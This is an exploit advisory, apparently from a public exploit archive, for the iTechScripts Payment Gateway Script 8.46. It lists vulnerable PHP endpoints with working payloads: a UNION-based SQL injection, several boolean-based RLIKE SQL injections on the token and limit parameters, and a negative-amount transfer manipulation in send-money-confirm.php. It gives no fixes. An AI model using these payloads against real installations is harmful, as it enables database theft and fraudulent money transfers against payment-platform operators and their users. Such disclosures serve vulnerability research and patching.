ITechScripts Payment Gateway Script 8.46 SQL Injection
Posted on 30 November -0001
<HTML><HEAD><TITLE>iTechScripts Payment Gateway Script 8.46 SQL Injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Exploit Title : Payment Gateway Script v8.46 - Multiple Vulnerability Author : Hasan Emre Ozer Google Dork : - Date : 18/01/2017 Type : webapps Platform: PHP Vendor Homepage : http://itechscripts.com/payment-gateway-script/ <http://itechscripts.com/image-sharing-script/> Sofware Price and Demo : $400 http://payment-gateway.itechscripts.com <http://photo-sharing.itechscripts.com/> ------------------------------------------------------ Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]/user-profile.php Vulnerable Parameters: token Method: GET Payload: -3519' UNION ALL SELECT NULL,NULL,CONCAT(0x7170767871,0x6850685261566a4d586d544e68636d7458684a7943657a70704f697a6767734c4c50654b495a5770,0x716a7a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# ------------------------------------------------------ Type: IDOR Vulnerable URL: http://localhost/[PATH]/send-money-confirm.php Vulnerable Parameters: t_amount and t_paid Method: POST Payload: negative money value (ps:-1350) ------------------------------------------------------ Type: Boolean Based Sql Injection Vulnerable URL:http://localhost/[PATH]/netbank_historyDetails.php Vulnerable Parameters: token Method: GET Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN 0x343034306334636134323338613062393233383230646363353039613666373538343962 ELSE 0x28 END))-- BxvH ------------------------------------------------------ Type: Boolean Based Sql Injection Vulnerable URL:http://localhost/[PATH]/netbank_histPrew.php Vulnerable Parameters: token Method: GET Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN 0x343034306334636134323338613062393233383230646363353039613666373538343962 ELSE 0x28 END))-- BxvH ------------------------------------------------------ Type: Boolean Based Sql Injection Vulnerable URL:http://localhost/[PATH]/overview.php Vulnerable Parameters: limit Method: GET Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN 0x343034306334636134323338613062393233383230646363353039613666373538343962 ELSE 0x28 END))-- BxvH -- Best Regards, Hasan Emre </BODY></HTML>